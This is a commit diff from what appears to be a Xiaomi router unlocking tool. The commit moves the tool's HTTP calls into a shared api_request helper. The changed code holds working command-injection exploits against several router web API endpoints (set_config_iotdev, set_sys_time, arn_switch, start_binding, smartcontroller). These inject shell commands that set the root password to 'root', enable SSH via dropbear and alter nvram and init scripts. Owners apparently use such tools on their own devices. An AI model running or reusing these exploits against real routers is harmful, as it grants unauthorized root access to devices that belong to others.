gateway: Add common function api_request

main
remittor 4 weeks ago
parent bcab47f1e7
commit e34a3439c7

@ -38,17 +38,16 @@ if ret > 0:
die(0, "SSH server already installed and running")
stok = gw.web_login()
ext_name = 'misystem/set_config_iotdev'
user_id = '_username_'
def exec_cmd(cmd):
params = { 'bssid': 'Xiaomi', 'user_id': user_id, 'ssid': ('-h' + '\n' + cmd + '\n') }
res = requests.get(gw.apiurl + ext_name, params = params)
return res.text
def exec_cmd(cmd, api = 'API/misystem/set_config_iotdev'):
params = { 'bssid': 'Xiaomi', 'user_id': '_username_', 'ssid': ('-h' + '\n' + cmd + '\n') }
resp = gw.api_request(api, params)
return resp
res = exec_cmd('nvram set bootdelay=3; set boot_wait=on; nvram set ssh_en=1; nvram commit;')
if res != '{"code":0}':
die('Extension "/api/{}" not working!'.format(ext_name))
if not res or int(res['code']) != 0:
die('Exploit "set_config_iotdev" not working!')
cmd = ''
cmd += 'echo -e "root\\nroot" | passwd root' + '\n'
@ -58,8 +57,8 @@ cmd += "/etc/init.d/dropbear enable" + '\n'
cmd += "/etc/init.d/dropbear restart" + '\n'
cmd += 'logger -p err -t XMiR "completed!"' + '\n'
res = exec_cmd(cmd)
#if res != '{"code":0}':
# die('Extension "/api/misystem/set_config_iotdev" not working!!!')
#if not res or int(res['code']) != 0:
# die('Exploit "set_config_iotdev" not working!!!')
time.sleep(0.5)
gw.passw = 'root'

@ -40,23 +40,19 @@ if not info or info["code"] != 0:
die('Cannot get init_info')
ccode = info["countrycode"]
if ccode == "CN":
print('Current CountryCode = CN')
print(f'Current CountryCode = {ccode}')
stok = gw.web_login()
def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'):
params = cmd
if isinstance(cmd, str):
params = { 'timezone': " ' ; " + cmd + " ; " }
res = requests.get(gw.apiurl + api, params = params)
return res.text
def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
return resp
def get_netmode():
res = exec_cmd(api = 'xqnetwork/get_netmode')
if '"code":0' in res:
dp = json.loads(res)
return int(dp["netmode"])
res = gw.api_request('API/xqnetwork/get_netmode')
if res and res['code'] == 0:
return int(res["netmode"])
return -1
netmode = get_netmode()
@ -109,7 +105,7 @@ if netmode != 4:
#res = exec_cmd('logger hello_world_3335556_')
res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
if '"code":0' not in res:
if not res or res['code'] != 0:
die('Exploit not working!!!')
#res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear")

@ -69,16 +69,16 @@ vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfil
max_cmd_len = 100 - 1 - len(vuln_cmd)
hackCheck = False
def exec_smart_cmd(cmd, timeout = 7):
api = 'xqsmarthome/request_smartcontroller'
def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'):
sc_command = cmd['command']
payload = json.dumps(cmd, separators = (',', ':'))
try:
res = requests.post(gw.apiurl + api, data = { "payload": payload }, timeout = timeout)
data = { "payload": payload }
res = gw.api_request(api, data, resp = 'text', post = 'x-www-form', timeout = timeout)
except Exception as e:
msg = getattr(e, 'message', str(e))
raise ExploitError(f'Cannot send POST-request "{sc_command}" to SmartController service. {msg}')
return res.text
return res
def exec_smart_command(cmd, timeout = 7, ignore_err_code = 0):
res = exec_smart_cmd( { "command": cmd } , timeout = timeout)

@ -39,23 +39,19 @@ print(f'Current CountryCode = {ccode}')
stok = gw.web_login()
def exploit_1(cmd = { }, api = 'misystem/arn_switch'):
def exploit_1(cmd, api = 'API/misystem/arn_switch'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
params = { 'open': 1, 'mode': 1, 'level': "\n" + cmd + "\n" }
res = requests.get(gw.apiurl + api, params = params)
return res.text
res = gw.api_request(api, params, resp = 'text')
return res
def exploit_2(cmd = { }, api = 'xqsystem/start_binding'):
def exploit_2(cmd, api = 'API/xqsystem/start_binding'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
params = { 'uid': 1234, 'key': "1234'\n" + cmd + "\n'" }
res = requests.get(gw.apiurl + api, params = params)
return res.text
res = gw.api_request(api, params, resp = 'text')
return res
# get device orig system time

@ -49,18 +49,13 @@ def die(*args):
print(" ")
sys.exit(err)
def get_http_headers():
headers = {}
headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
return headers
class Gateway():
def __init_fields(self):
self.use_ssh = True
self.use_ftp = False
self.verbose = 2
self.con_timeout = 2
self.timeout = 4
self.memcfg = None # shared memory "XMiR_12345"
self.model_id = -2
@ -77,6 +72,8 @@ class Gateway():
self.socket = None # TCP socket for SSH
self.ssh = None # SSH session
self.login = 'root' # default username
self.user_agent = "curl/8.4.0"
self.last_resp_text = None
def __init__(self, timeout = 4, verbose = 2, detect_device = True, detect_ssh = True, load_cfg = True):
random.seed()
@ -103,6 +100,50 @@ class Gateway():
if port <= 0:
die("Can't found valid SSH server on IP {}".format(self.ip_addr))
def api_request(self, path, params = None, resp = 'json', post = '', timeout = 4, stream = False):
self.last_resp_code = 0
self.last_resp_text = None
headers = { }
if post == 'raw' or post == 'bin':
headers["Content-Type"] = "application/octet-stream"
elif post == 'json':
headers["Content-Type"] = "application/json"
elif post:
headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
headers["User-Agent"] = self.user_agent
url = f"http://{self.ip_addr}/cgi-bin/luci/"
if path.startswith('API/'):
url += f';stok={self.stok}/api' + path[3:]
else:
url += path
t_timeout = (self.con_timeout, timeout)
if post:
response = requests.post(url, data = params, stream = stream, headers = headers, timeout = t_timeout)
else:
response = requests.get(url, params = params, stream = stream, headers = headers, timeout = t_timeout)
self.last_resp_code = response.status_code
if resp and not stream:
try:
self.last_resp_text = response.text
except Exception:
pass
if resp == 'text':
return response.text
if resp == 'TEXT':
response.raise_for_status()
return response.text
if resp.lower() == 'json':
if response.status_code == 500: # Internal Server Error
return None
response.raise_for_status()
try:
dres = json.loads(response.text)
except Exception:
raise RuntimeError(f'Received inccorrect JSON from "{path}" => {response.text}')
return dres
return response
#return response.status_code, response.content
def detect_device(self):
self.model_id = -2
self.device_name = None
@ -114,25 +155,24 @@ class Gateway():
self.nonce_key = None
self.status = -2
try:
r0 = requests.get("http://{ip_addr}/cgi-bin/luci/web".format(ip_addr = self.ip_addr), timeout = self.timeout)
r0.raise_for_status()
page = self.api_request('web', resp = 'TEXT', timeout = self.timeout)
#with open("r0.txt", "wb") as file:
# file.write(r0.text.encode("utf-8"))
hardware = re.findall(r'hardware = \'(.*?)\'', r0.text)
# file.write(page.encode("utf-8"))
hardware = re.findall(r'hardware = \'(.*?)\'', page)
if hardware and len(hardware) > 0:
self.device_name = hardware[0]
else:
hardware = re.findall(r'hardwareVersion: \'(.*?)\'', r0.text)
hardware = re.findall(r'hardwareVersion: \'(.*?)\'', page)
if hardware and len(hardware) > 0:
self.device_name = hardware[0]
self.device_name = self.device_name.upper()
romver = re.search(r'romVersion: \'(.*?)\'', r0.text)
romver = re.search(r'romVersion: \'(.*?)\'', page)
self.rom_version = romver.group(1).strip() if romver else None
romchan = re.search(r'romChannel: \'(.*?)\'', r0.text)
romchan = re.search(r'romChannel: \'(.*?)\'', page)
self.rom_channel = romchan.group(1).strip().lower() if romchan else None
mac_address = re.search(r'var deviceId = \'(.*?)\'', r0.text)
mac_address = re.search(r'var deviceId = \'(.*?)\'', page)
self.mac_address = mac_address.group(1) if mac_address else None
nonce_key = re.search(r'key: \'(.*)\',', r0.text)
nonce_key = re.search(r'key: \'(.*)\',', page)
self.nonce_key = nonce_key.group(1) if nonce_key else None
except requests.exceptions.HTTPError as e:
print("Http Error:", e)
@ -151,7 +191,7 @@ class Gateway():
die("You need to make the initial configuration in the WEB of the device!")
self.model_id = self.get_modelid_by_name(self.device_name)
self.status = -1
x = r0.text.find('a href="/cgi-bin/luci/web/init/hello')
x = page.find('a href="/cgi-bin/luci/web/init/hello')
if (x > 10):
die("You need to make the initial configuration in the WEB of the device!")
self.status = 1
@ -173,15 +213,14 @@ class Gateway():
self.xqpassword = self.get_xqpassword()
return self.status
def web_ping(self, timeout, wait_timeout = 0):
def web_ping(self, con_timeout, wait_timeout = 0):
ret = True
start_time = datetime.datetime.now()
try:
res = requests.get("http://{ip_addr}/cgi-bin/luci/web".format(ip_addr = self.ip_addr), timeout = timeout)
res.raise_for_status()
mac_address = re.search(r'var deviceId = \'(.*?)\'', res.text)
page = self.api_request('web', resp = 'TEXT', timeout = (con_timeout, 4))
mac_address = re.search(r'var deviceId = \'(.*?)\'', page)
self.mac_address = mac_address.group(1) if mac_address else None
nonce_key = re.search(r'key: \'(.*)\',', res.text)
nonce_key = re.search(r'key: \'(.*)\',', page)
self.nonce_key = nonce_key.group(1) if nonce_key else None
except Exception:
ret = False
@ -210,7 +249,7 @@ class Gateway():
else:
return hashlib.sha256(string).hexdigest()
def web_login(self):
def web_login(self, timeout = 4):
self.stok = None
if not self.nonce_key or not self.mac_address:
die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.")
@ -225,11 +264,10 @@ class Gateway():
password = (nonce + account_str).encode('utf-8')
password = self.xqhash(password)
username = 'admin'
data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce)
requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = self.ip_addr)
res = requests.post(requrl, data = data, headers = get_http_headers())
data = f"username={username}&password={password}&logtype=2&nonce={nonce}"
text = self.api_request('api/xqsystem/login', data, post = 'x-www-form', resp = 'text', timeout = timeout)
try:
stok = re.findall(r'"token":"(.*?)"', res.text)[0]
stok = re.findall(r'"token":"(.*?)"', text)[0]
except Exception:
self.webpassword = ""
die("WEB password is not correct! (encryptmode = {})".format(self.encryptmode))
@ -242,16 +280,13 @@ class Gateway():
return "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = self.ip_addr, stok = self.stok)
def get_pub_info(self, api_name, timeout = 5):
subsys = 'xqsystem'
if api_name == 'router_info' or api_name == 'topo_graph':
subsys = 'misystem'
try:
url = "http://{ip_addr}/cgi-bin/luci/api/{subsys}/{api_name}".format(ip_addr = self.ip_addr, subsys = subsys, api_name = api_name)
res = requests.get(url, timeout = timeout)
res.raise_for_status()
except Exception:
return {}
return json.loads(res.text)
if '/' in api_name:
path = api_name
elif api_name in [ 'router_info', 'topo_graph' ]:
path = f'api/misystem/{api_name}'
else:
path = f'api/xqsystem/{api_name}'
return self.api_request(path, timeout = timeout)
def get_init_info(self, timeout = 5):
return self.get_pub_info('init_info', timeout = timeout)
@ -278,14 +313,9 @@ class Gateway():
def get_device_systime(self, fix_tz = True):
# http://192.168.31.1/cgi-bin/luci/;stok=14b996378966455753104d187c1150b4/api/misystem/sys_time
# response: {"time":{"min":32,"day":4,"index":0,"month":10,"year":2023,"sec":7,"hour":6,"timezone":"XXX"},"code":0}
res = requests.get(self.apiurl + 'misystem/sys_time')
try:
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise RuntimeError(f'Error on parse response for command "sys_time" => {res.text}')
if code != 0:
raise RuntimeError(f'Error on get sys_time => {res.text}')
dres = self.api_request('API/misystem/sys_time')
if not dres or dres['code'] != 0:
raise RuntimeError(f'Error on get sys_time => {dres}')
dst = dres['time']
if fix_tz and 'timezone' in dst:
if "'" in dst['timezone'] or ";" in dst['timezone']:
@ -302,15 +332,10 @@ class Gateway():
sec = dst['sec']
timezone = dst['timezone']
params = { 'time': f"{year}-{month}-{day} {hour}:{min}:{sec}", 'timezone': timezone }
res = requests.get(self.apiurl + 'misystem/set_sys_time', params = params)
try:
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise RuntimeError(f'Error on parse response for command "set_sys_time" => {res.text}')
if code != 0:
raise RuntimeError(f'Error on exec command "set_sys_time" => {res.text}')
return res.text
dres = self.api_request('API/misystem/set_sys_time', params)
if not dres or dres['code'] != 0:
raise RuntimeError(f'Error on exec command "set_sys_time" => {dres}')
return True
def wait_shutdown(self, timeout, verbose = 1):
if verbose:
@ -353,10 +378,10 @@ class Gateway():
return False
def reboot_device(self, wait_timeout = None):
api = 'API/xqsystem/reboot'
try:
params = { 'client': 'web' }
res = requests.post(self.apiurl + "xqsystem/reboot", params = params, timeout=self.timeout)
if res.text.find('"code":0') < 0:
text = self.api_request(api, { 'client': 'web' }, post = 'json', resp = 'text')
if '"code":0' not in text:
return False
if wait_timeout:
if not self.wait_shutdown(wait_timeout):

@ -963,11 +963,11 @@ class SysLog():
die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
if self.verbose > 0:
print("Start generating syslog...")
r2 = requests.get(gw.apiurl + "misystem/sys_log", timeout = timeout)
if r2.text.find('"code":0') < 0:
r2 = gw.api_request("API/misystem/sys_log", resp = 'text', timeout = timeout)
if '"code":0' not in r2:
die("SysLog not generated!")
try:
path = re.search(r'"path":"(.*?)"', r2.text)
path = re.search(r'"path":"(.*?)"', r2)
path = path.group(1).strip()
except Exception:
die("SysLog not generated! (2)")

Loading…
Cancel
Save